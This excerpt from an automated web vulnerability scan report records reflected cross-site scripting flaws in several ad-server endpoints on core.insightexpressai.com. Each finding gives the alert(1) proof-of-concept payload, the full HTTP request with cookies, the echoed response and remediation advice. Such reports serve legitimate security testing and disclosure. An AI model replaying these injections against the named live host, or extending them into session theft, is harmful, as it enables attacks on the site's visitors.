var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
ghtExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208ca2f0'-alert(1)-'7afbef3b044'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,"REMO":false},"Type"
...[SNIP]...

3.9. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the esi request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db4aa'-alert(1)-'446918a9653 was submitted in the esi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=truedb4aa'-alert(1)-'446918a9653&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:09:58 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19741

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
cs.AddParam('timeinview',InsightExpress.Analytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=truedb4aa'-alert(1)-'446918a9653&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=
...[SNIP]...

3.10. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da144'-alert(1)-'0b64955bbf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208&da144'-alert(1)-'0b64955bbf4=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:13:31 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19754

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
htExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208&da144'-alert(1)-'0b64955bbf4=1'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,"REMO":false},"Typ
...[SNIP]...

3.11. http://core.insightexpressai.com/adServer/GetInvite2.aspx [referer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the referer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e34a'-alert(1)-'d39809cba36 was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com3e34a'-alert(1)-'d39809cba36&siteID=197028858&creativeID=142745208 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:10:14 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19769

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
ytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=161857&referer=www.darkreading.com3e34a'-alert(1)-'d39809cba36&siteID=197028858&creativeID=142745208'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{
...[SNIP]...

3.12. http://core.insightexpressai.com/adServer/GetInvite2.aspx [siteID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the siteID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7386'-alert(1)-'a2b2aa77b38 was submitted in the siteID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858e7386'-alert(1)-'a2b2aa77b38&creativeID=142745208 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:10:26 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19741

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
View);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858e7386'-alert(1)-'a2b2aa77b38&creativeID=142745208'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false
...[SNIP]...

3.13. http://core.insightexpressai.com/adServer/adServerESI.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a038b"%3balert(1)//cbec0d2b53d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a038b";alert(1)//cbec0d2b53d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/adServerESI.aspx?bannerID=160683&siteID=197028858&creativeID=142745208&a038b"%3balert(1)//cbec0d2b53d=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBanners1946=161858; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAILastHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAICampaignCounter1946=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners1946=161858,161857; domain=.insightexpressai.com; expires=Fri, 11-Dec-2015 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter161857=1; domain=.insightexpressai.com; expires=Fri, 11-Dec-2015 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit1946=12%2f11%2f2010+9%3a49%3a13+PM; domain=.insightexpressai.com; expires=Fri, 11-Dec-2015 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter1946=2; domain=.insightexpressai.com; expires=Fri, 11-Dec-2015 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Sun, 12 Dec 2010 03:13:48 GMT
Pragma: no-cache
Date: Sun, 12 Dec 2010 03:13:48 GMT
Connection: close
Cache-Control: no-store
Content-Length: 1886


(function() {var InsightExpress={}; InsightExpress.DomainName = 'core.insightexpressai.com';InsightExpress.BannerID=161857;InsightExpress.CampaignID=1946; InsightExpress.AddProps=function(c,p
...[SNIP]...
;var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858&a038b";alert(1)//cbec0d2b53d=1&creativeID=142745208";document.getElementsByTagName('head')[0].appendChild(s);}})();

3.14. http://core.insightexpressai.com/adserver/invites/Reconcile.aspx [bannerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adserver/invites/Reconcile.aspx

Issue detail

The value of the bannerID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 518fc'%3balert(1)//339d45147ba was submitted in the bannerID parameter. This input was echoed as 518fc';alert(1)//339d45147ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adserver/invites/Reconcile.aspx?bannerID=161857518fc'%3balert(1)//339d45147ba&campaignID=1946 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857,161857; IXAIBannerCounter161857=2; IXAILastHit1946=12%2f11%2f2010+10%3a02%3a02+PM; IXAICampaignCounter1946=3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:10:37 GMT
Connection: close
Cache-Control: no-store
Content-Length: 17631


<script>

var ReconcilePage = true;
var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText
...[SNIP]...
t();
InsightExpress.DomainName = 'core.insightexpressai.com';
